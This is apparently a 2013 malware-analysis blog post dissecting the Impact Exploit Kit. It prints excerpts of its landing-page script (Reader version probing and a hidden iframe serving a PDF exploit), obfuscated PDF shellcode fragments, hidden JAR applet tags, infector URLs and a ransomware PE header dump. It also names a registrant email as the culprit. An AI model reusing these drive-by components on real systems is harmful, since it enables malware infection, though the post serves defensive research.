Thursday, January 10, 2013

Let's say Hello! to Impact Exploit Kit w/ RansomWare Infector

This is an investigation of what we initially thought an unknown exploit kit case, thank's to our friends (@Set_Abominae & @MalwareSigs) for recognizing it & adviced us as Impact Exploit Kit.
The investigation was done two days in a row, scattered in our twitter for there are only some minutes to do it within daily work, by some request I dare myself to gather the documentations & put into this post. So here we go!
It starts with the two infector urls pointed to IP 217.23.6.57 below:
afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070   
davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
These are possibility of domain names used for this EK infector:
hhmarshall1971.net
marshallfred26.net
afgarcia67.net  
martinkashley87.net
davidsonfrc89.net
rosettasgiantonio9.net
We fetch it as per below:
=> `lavaafly.php@janeoleg=875070'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
   :
GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0
User-Agent: #MalwareMustDie Playing with your jars
Accept: */*
Host: davidsonfrc89.net
Connection: Keep-Alive
   :
HTTP request sent, awaiting response...
   :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 07:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
  :
200 OK
URI content encoding = `UTF-8'
Length: unspecified [text/html]
Saving to: `lavaafly.php?janeoleg=875070'
2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]
Ending up with the landing page of this exploit kit. We neutralized the code here for analysis purpose -->>[PASTEBIN]

Landing Page Script Structure

As always we mentioned, it's important to recognize the structure of a landing-page's script. The current one is like the below formats:
// first applet with jar download..
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" value="0jfX19NXhX1...CgjC0.Ch3B2lCjZdp">
</applet>

// second applet with jar download..
<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt.../hkgjNZVkgp">
</applet>

// some html..
<html><body></body>

//a customized plugindetect script contains "actojack"pdf for exploit..
<script type="text/javascript">
var actojack=
 { version:"ruptable",name:"actojack",handler:function(c,b,a)
   { return function()
     { c(b,a)
     }
   }
   ,isDefined:function(b)
   { return typeof b!="undefined"
         :
         :
 pdfver = actojack.getVersion("AdobeReader");
 if (typeof pdfver == "string")
 { pdfver = pdfver.split(",");
   pdfver[3] = pdfver[3].substring(0, 1);
   pdfver = parseInt(pdfver.join(""), 10);
 } else
   { pdfver = 0;   }
 function ifr(abc)
   {var dh = document.createElement("iframe");
   dh.setAttribute("width", 1);
   dh.setAttribute("height", 1);
   dh.setAttribute("src", abc);
   document.body.appendChild(dh);
   };
 function pdf()
 { try
   { if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301))
     { ifr("lacecape.php");  }   }
   catch(e)    {   }
 }
 setTimeout(pdf,2110);
There are a PDF for exploit & two JAR download infector files in the landing-page, no obfuscation used, just a condensed/compressed code used.

PDF Exploit

Here's the function for downloading PDF via IFRAME:
    :
function ifr(abc)
 { var dh = document.createElement("iframe");
   dh.setAttribute("width", 1);
   dh.setAttribute("height", 1);
   dh.setAttribute("src", abc);
   document.body.appendChild(dh); };
     :
It was called by the function pdf() below:
function pdf()
 { try
   { if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301))
     { ifr("lacecape.php");
The download PDF path is a self explanatory in the code, go figure :-) These both functions are located in the end of the script. The PDF itsef has the script in the address 0x415-0x144A , with the structure below:
// variable settings..
ozsmpkoqb="affsdfsa";
var oazgntrlz = "tw%kf";
ivtwcjqa=event.target;
vjbvirqrz=this.w[ivtwcjqa.info.Date];

//obfuscation pattern under a string in a function...
function cskfhyrah(){return("q1ggh55jre..jre0Aq1ggh55jre7Dq1ggh55jre0A")}

//deobfuscation generator...
vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");
bpzritaa=ddyoxazmq;
vjbvirqrz(unescape(bpzritaa));

/*----end of structure----*/

// additional: obfuscation pattern :
q1ggh55jre2Bq1ggh55jre58q1ggh55jre6Eq1ggh55jre51q1ggh55jre
h55jre42q1ggh55jre63q1ggh55jre69q1ggh55jre2Fq1ggh55jre76q1
re37q1ggh55jre79q1ggh55jre35q1ggh55jre76q1ggh55jre4Cq1ggh5
q1ggh55jre38q1ggh55jre37q1ggh55jre2Bq1ggh55jre74q1ggh55jre
h55jre62q1ggh55jre49q1ggh55jre43q1ggh55jre36q1ggh55jre77q1
re4Dq1ggh55jre6Dq1ggh55jre69q1ggh55jre56q1ggh55jre77q1ggh5
q1ggh55jre2Bq1ggh55jre76q1ggh55jre4Cq1ggh55jre7Aq1ggh55jre
h55jre4Bq1ggh55jre6Cq1ggh55jre63q1ggh55jre34q1ggh55jre36q1
Noted the obfuscation under a function to avoid automation, and the obfs pattern contain repetition of "q1ggh55jre" strings. The first decoding key is using the line provided in he script below:
vjbvirqrz("ddyoxazmq=cskfhyrah().repl"+"a"+"ce(/q1ggh55jre/g,oazgntrlz.charAt(2));");
Which will burp you the other obfs script, if you runs it down you'll see strings below:
gwvtcewuw = "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC..
  :
xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8
Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy
86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbI
C6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmuj
XzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc4
64181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO72
8vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4z
HLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX
         :
↑The string contains the exploit and shellcode infector. We manually decoded this PDF infector here -->>[PASTEBIN] By the way it exploits, we recognize that LibTIFF CVE-2010-0188 is used. The PoC of malware download via this infector PDF:
GET /Jdowu32ds2s/janudent.php HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_04
Host: davidsonfrc89.net
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 07 Jan 2013 07:13:48 GMT
Content-Type: application/x-msdownload
Content-Length: 81136
Connection: keep-alive
Pragma: public
Expires: Mon, 07 Jan 2013 07:13:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="0959c.exe"
Content-Transfer-Encoding: binary
MZ......................@........................
.......................!..L.!This program cannot be run in DOS mode.

The JAR Exploits

Two applets was detected at the head of the landing-page's code:
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" 
value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
</applet>

<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" 
value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
</applet>
We'll see two downloadable paths & fecth them:
GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:32:58 GMT
Content-Type: application/x-java-archive
Content-Length: 9465
Connection: keep-alive
Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT
ETag: "39a0afc-24f9-4d2101e35e1c0"
Accept-Ranges: bytes
  :
200 OK
Length: 9,465 (9.2K) [application/x-java-archive]
18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465]

GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:36:01 GMT
Content-Type: application/x-java-archive
Content-Length: 5502
Connection: keep-alive
Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT
ETag: "39a0afd-157e-4d1a6f66da600"
Accept-Ranges: bytes
  :
200 OK
Length: 5,502 (5.4K) [application/x-java-archive]
18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]
These jars contains exploits of CVE-2012-1723 & CVE-2012-5076. The complete JARs exploit analysis guide is in here --->>[PASTEBIN]

Payload

Through the infection of this landing page you'll get exploited by either PDF or JARs and get same payload as per below PDF network traffic as evidence;
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Mon, 07 Jan 2013 07:13:48 GMT
Content-Type: application/x-msdownload
Content-Length: 81136
Connection: keep-alive
Pragma: public
Expires: Mon, 07 Jan 2013 07:13:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="0959c.exe"
Content-Transfer-Encoding: binary
MZ......................@........................
.......................!..L.!This program cannot be run in DOS mode.
$.........;<..Uo..Uo..Uo..Fo..Uo.[.o..Uo..To!.Uo..Uo..Uo...o..Uo...o..
Uo...o..UoRich..Uo........................PE..L...LL.P................
. ..........p.
   :
It is a PE binary file
Sections:
   .text 0x1000 0x1e5a 8192
   .data 0x3000 0x7a14 31232
   .rsrc 0xb000 0x66d8 26624
   .reloc 0x12000 0x380 1024

Compilation timedatestamp.....: 2013-01-05 15:52:44
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001B70

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   C6 FC 3B 3C 82 9D 55 6F 82 9D 55 6F 82 9D 55 6F    ..;<..Uo..Uo..Uo
0090   0C 82 46 6F 81 9D 55 6F A5 5B 2E 6F 8D 9D 55 6F    ..Fo..Uo.[.o..Uo
00A0   82 9D 54 6F 21 9D 55 6F 82 9D 55 6F 83 9D 55 6F    ..To!.Uo..Uo..Uo
00B0   9C CF D6 6F 83 9D 55 6F 9C CF C1 6F 83 9D 55 6F    ...o..Uo...o..Uo
00C0   9C CF C4 6F 83 9D 55 6F 52 69 63 68 82 9D 55 6F    ...o..UoRich..Uo
00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00E0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00    ........PE..L...
00F0   4C 4C E8 50 00 00 00 00 00 00 00 00 E0 00 02 01    LL.P............
 :                            :
↑hello Ransomware! Please be careful if you test this sample.. If we check itto Virus Total further:
SHA256: 57d2f97502f161d290e6300c74b36ba1c7e0de914fc7d6dec4e55d763841be2f SHA1: 311360a772cdcd942f3fc7696e739e941be5d4ec MD5: fba8bbf5b9a6079ace6621b879aec31a File size: 79.2 KB ( 81136 bytes ) File name: ifgxpers.exevr File type: Win32 EXE Tags: peexe Detection ratio: 10 / 44 Analysis date: 2013-01-07 23:11:44 UTC ( 1 day, 11 hours ago ) URL -->>[VirusTotal]
With Malware names:
DrWeb                    : Trojan.MulDrop4.20350
TrendMicro               : HS_RANSDIGI.SM
TrendMicro-HouseCall     : TROJ_GEN.F47V0107
Emsisoft                 : Trojan.Win32.Agent.AMN (A)
Kaspersky                : Trojan-Ransom.Win32.Blocker.agrk
Malwarebytes             : Trojan.FakeMS
ViRobot                  : Trojan.Win32.A.Blocker.81136
Panda                    : Trj/Ransom.AB
SUPERAntiSpyware         : Trojan.Agent/Gen-Kryptic
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen

Research & Samples

The samples & captures data are shared here --->>[MEDIAFIRE] Pic of the materials shared in this analysis: Virus Total Detection Ratio of Overall Samples (Click the Ratio for details)
File's Time-Stamp Size Name Ratio MD5 ------------------------------------------------------------------------------ 2013/01/09 19:08 81,136 0959c.exe VT(23/46) fba8bbf5b9a6079ace6621b879aec31a 2013/01/08 15:25 5,612 janudent.pdf VT(7/46) ed7c9c976ac0f3399c6928ddad43b739 2012/12/30 20:22 9,465 jimmdemy.jar VT(7/46) be2bcd6c3f2aee6432358e1fb37a8dc2 2012/12/25 14:55 5,502 torylane.jar VT(1/46) ae66fc69244abec22f20384356806ad2 2013/01/08 16:30 29,766 lavaafly.php VT(1/46) 6305989da0c9ac0f4c1fd138b22d634e

Some crime investigation & evidence

We're sure that the person behind this ID: davidsonfrc89@yahoo.com is responsible.
> davidsonfrc89.net
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

davidsonfrc89.net
        primary name server = ns1.topdns.me
        responsible mail addr = davidsonfrc89@yahoo.com
        serial  = 1357651830
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 432000 (5 days)
        default TTL = 38400 (10 hours 40 mins)
davidsonfrc89.net       nameserver = ns1.topdns.me
davidsonfrc89.net       nameserver = ns2.topdns.me
davidsonfrc89.net       internet address = 217.23.6.56
>
>
> afgarcia67.net
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

afgarcia67.net
        primary name server = ns1.topdns.me
        responsible mail addr = davidsonfrc89@yahoo.com
        serial  = 1357651830
        refresh = 10800 (3 hours)
        retry   = 3600 (1 hour)
        expire  = 432000 (5 days)
        default TTL = 38400 (10 hours 40 mins)
afgarcia67.net  nameserver = ns1.topdns.me
afgarcia67.net  nameserver = ns2.topdns.me
afgarcia67.net  internet address = 217.23.6.56

Good Reference of the Impact Exploit Kit

(Click the number to jump to reference page)
[0] Impact Exploit Kit CURRENT Reported Infection URL [1] Kahu Security: New Exploit Kits [2] Malware don't need Coffee: Inside Impact Exploit Kit - back on track (?) [3] MalwareSigs: Impact Exploit Kit
#MalwareMustDie!

No comments:

Post a Comment